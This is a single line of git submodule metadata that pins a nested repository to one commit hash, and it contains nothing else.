Subproject commit 381b126d6a8dc3ca38f7fab73cb80175fcbe8d45